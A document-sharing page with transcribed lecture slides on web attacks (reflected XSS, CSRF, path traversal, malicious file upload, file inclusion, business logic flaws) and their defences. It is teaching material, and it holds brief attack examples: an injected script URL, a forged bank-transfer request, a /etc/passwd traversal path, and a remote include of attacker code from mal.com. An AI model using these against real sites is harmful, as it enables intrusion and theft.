Reflected XSS Cross-Site Request Forgery Other Attacks

Similar documents
CIS 4360 Secure Computer Systems XSS

WEB SECURITY: XSS & CSRF

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

Web Application Security. Philippe Bogaerts

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

CS 161 Computer Security

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2017

Robust Defenses for Cross-Site Request Forgery Review

P2_L12 Web Security Page 1

Application vulnerabilities and defences

Client Side Injection on Web Applications

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

CSCE 813 Internet Security Case Study II: XSS

Web Security. Attacks on Servers 11/6/2017 1

Magento Survey Extension User Guide

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Web Vulnerabilities. And The People Who Love Them

CSC 482/582: Computer Security. Cross-Site Security

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Web Security: Vulnerabilities & Attacks

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Web Security IV: Cross-Site Attacks

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Web Attacks CMSC 414. September 25 & 27, 2017

Lecture Notes on Safety and Information Flow on the Web: II

CS 142 Winter Session Management. Dan Boneh

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Common Websites Security Issues. Ziv Perry

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Web Security II. Slides from M. Hicks, University of Maryland

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Web Security, Part 2

Advanced Web Technology 10) XSS, CSRF and SQL Injection

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Robust Defenses for Cross-Site Request Forgery

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Security: Vulnerabilities & Attacks

Security for the Web. Thanks to Dave Levin for some slides

Web Penetration Testing

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

OWASP TOP 10. By: Ilia

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

CS 161 Computer Security

Network Security - ISA 656 Web Security

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Web Application Security

last time: command injection

Robust Defenses for Cross-Site Request Forgery

Web Security: Web Application Security [continued]

NET 311 INFORMATION SECURITY

3. Apache Server Vulnerability Identification and Analysis

A4: Insecure Direct Object References

Ruby on Rails Secure Coding Recommendations

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

Adon'tbe an Adobe victim

Passwords. CS 166: Introduction to Computer Systems Security. 3/1/18 Passwords J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.

PHPBasket 4 Administrator Documentation

Hacking Intranet Websites from the Outside

Web security: an introduction to attack techniques and defense methods

EasyCrypt passes an independent security audit

Security for the Web. Thanks to Dave Levin for some slides

The security of Mozilla Firefox s Extensions. Kristjan Krips

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Content Security Policy

Web Security: XSS; Sessions

Information Security CS 526 Topic 11

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Web Security Computer Security Peter Reiher December 9, 2014

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

WebGoat Lab session overview

CS 161 Computer Security

CS 155 Project 2. Overview & Part A

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CS 161 Computer Security

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Secure Coding and Code Review. Berlin : 2012


Introduction to Ethical Hacking

Information Security CS 526 Topic 8

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

More attacks on clients: Click-jacking/UI redressing, CSRF

Transcription:

Reflected XSS Cross-Site Request Forgery Other Attacks CS 166: Introduction to Computer Systems Security 2/21/18 XSS, CSRF, Other Attacks 1

Reflected XSS 2/21/18 XSS, CSRF, Other Attacks 2

Recap of Persistent XSS Attacker Victim submits malicious script into form requests page stores malicious script into page Server receives page with malicious script 2/21/18 XSS, CSRF, Other Attacks 3

Another XSS Attack Mallory (attacker) finds that Bob E.g., Bob embeds in the page a (web server) is vulnerable to XSS via a search term GET variable http://example.com/search.php? query=cs166 She crafts a URL that includes a Search results for CS166 malicious script in the variable?query= <script>doevil She tricks Alice (web client) to go to </script> this URL (e.g., phishing) The malicious script is executed by Alice 2/21/18 XSS, CSRF, Other Attacks 4

Attacker Reflected XSS sends URL with malicious script clicks on URL builds page that includes malicious script Victim Server receives page with malicious script 2/21/18 XSS, CSRF, Other Attacks 5

Cross-Site Request Forgery 2/21/18 XSS, CSRF, Other Attacks 6

Cross-Site Request Forgery (CSRF) Attacker s site has script that redirects and issues a request on target site E.g., document.location = https://bank.com/wiretransfer.php?amount=10000&recip ient=attacker&account=2567 If user is already logged in on target site Request is executed by target site on behalf of user E.g., funds are transferred from the user to the attacker 2/21/18 XSS, CSRF, Other Attacks 7

CSRF Trust Relationship Server trusts victim (login) Victim trusts attacker Attacker could be a hacked legitimate site Login Victim Server Legitimate Request Malicious Request Attacker 2/21/18 XSS, CSRF, Other Attacks 8

Login CSRF Attacker s site includes link or form that logs in victim on target site with attacker s account Subsequent victim s interaction with target site is shared with attacker Navigation in target site Data supplied to target site 2/22/18 XSS, CSRF, Other Attacks 9

CSRF Server-Side Defenses Synchronizer token Random token embedded by server in all HTML forms and verified by server CSRF request rejected because attacker cannot guess token Custom HTTP header Custom HTTP headers can be sent only via JavaScript JavaScript is subject to same-origin policy Site supports state-changing HTTP requests via JavaScript Server drops requests submitted without a custom HTTP header 2/21/18 XSS, CSRF, Other Attacks 10

Improper Path Sanitization 2/21/18 XSS, CSRF, Other Attacks 11

Improper Path Sanitization Problem: only some paths are valid; which ones? Improper path sanitization can lead to disallowed resources being accessed What sorts of resources/paths might we want to make off-limits? 2/21/18 XSS, CSRF, Other Attacks 12

Improper Path Sanitization What sorts of resources/paths might we want to make off-limits? Configuration files (e.g., Apache s.htaccess) Files outside the web root Files outside the upload directory Possibly more 2/21/18 XSS, CSRF, Other Attacks 13

Blacklists Attempt #1: Blacklists e.g., /foo/bar is off limits What s wrong with this? Multiple paths can refer to the same resource /foo/bar /foo//bar /foo/../foo/bar /foo/bar/baz/.. 2/21/18 XSS, CSRF, Other Attacks 14

Blacklists Attempt #1: Blacklists e.g., /foo/bar is off limits What s wrong with this? What about paths outside the web root? /../../etc/passwd Becomes /var/www/../../etc/passwd (e.g., /etc/passwd) 2/21/18 XSS, CSRF, Other Attacks 15

Whitelists Attempt #2: Whitelists e.g., only /foo/bar or /baz/blah are allowed What s wrong with this? How to keep the whitelist up to date? How to be nice to users e.g., /foo//bar is really /foo/bar 2/22/18 XSS, CSRF, Other Attacks 16

Parse Paths Attempt #3: Parse paths e.g., determine that foo.com/bar doesn t escape web root What s wrong with this? Correct parsing is hard 2/22/18 XSS, CSRF, Other Attacks 17

Solution Solution When possible, use existing implementations Apache does this correctly - use it For custom logic, don t use paths Store data in databases Don t use subfolders e.g., /var/uploads filter bad characters (/, \0) or bad path components (..,.) 2/21/18 XSS, CSRF, Other Attacks 18

File Upload 2/21/18 XSS, CSRF, Other Attacks 19

File Upload Several websites support file upload E.g., homework submission Apache s PHP plugin executes requested *.php files What the upload directory is inside the web root? e.g., /var/www/upload Upload evil.php Visit foo.com/upload/evil.php 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 20

Disallow PHP File Uploads Attempt #1: Disallow.php files What could go wrong? What if I want to upload a PHP file? Not sufficient for some configurations... 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 21

Embedded PHP <!-- date.html --> <html> <head><title>my Page</title></head> <body> <p>date: <?php echo date();?></p> </body> </html> 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 22

Circumvention Upload foo.html: <html> <?php do_bad_thing();?> </html> 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 23

Disallow PHP and HTML File Uploads Attempt #2: Disallow.php and.html files For example, allow only.jpg and.pdf What could go wrong? JPEG supports comments, so embed PHP in JPEG comment field Even if it didn t, we could still craft the right pixel sequences: \x3c\x3f\x70\x68\x70 - <?php \x3f\x3e -?> 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 24

Solution Solution: don t serve files directly Bad: foo.com/upload/foo.pdf Good: foo.com/get.php?file=foo.pdf Implement custom logic in get.php Don t allow access to upload directory Store outside of web root If that s not possible, use.htaccess or similar 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 25

File Inclusion 2/21/18 XSS, CSRF, Other Attacks 26

File Inclusion PHP (and other languages) allow dynamic includes include( lib.php ); Imagine a site with dynamically-generated includes: lang = $_GET[ lang ]; include($lang..php ); What could go wrong? 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 27

File Inclusion Let s say there s an add-user.php Only included after authentication as admin Can t load directly foo.com/add-user.php Visit foo.com/blah.php?lang=add-user&user=mallory&pass=6666 Makes the include: include( add-user.php ); 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 28

File Inclusion Many PHP functions treat paths as being file paths or URLs What could go wrong? foo.com/blah.php?lang=http://mal.com/mal Makes the include: include( http://mal.com/mal.php ); 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 29

Solution If you need to dynamically include files, keep a pre-set list, e.g., lang_files = array( en-us => en-us.php, en-gb => en-gb.php, en-l337 => en-l337.php ); 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/21/18 XSS, CSRF, Other Attacks 30

Business Logic Flaws 2/21/18 XSS, CSRF, Other Attacks 31

Business Logic Flaws Business logic is the high-level logic behind a web application s functionality E.g., A user must pay before having an item shipped to them Flaws in the implementation of this logic (or flaws in the logic itself) can be serious Often come from a mismatch between developer assumptions and reality 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 32

Cheating on Bulk Discounts Site offers bulk discounts on group of items When a new item is added to the cart, if a bulk discount applies, the prices of all items are lowered appropriately What could go wrong? Add many items to the cart, lowering prices Delete most of them, check out with a cheap item 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 33

Proceeding to Checkout In a shopping cart application, when checking out, user is directed through a series of pages: From cart, click checkout button Redirected to page to enter payment details If payment verifies, redirected to shipping details After shipping details verified, order is complete What could go wrong? Go directly to shipping details, skip payment 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 34

What We Have Learned Reflected XSS, where the injected malicious script is placed in a dynamically generated page by the vulnerable server Cross-Site Request Forgery, which submits a GET or POST to vulnerable server where the victim is logged in Various other server vulnerabilities Improper path sanitization File upload File inclusion Business logicflaws 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5 2/22/18 XSS, CSRF, Other Attacks 35

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback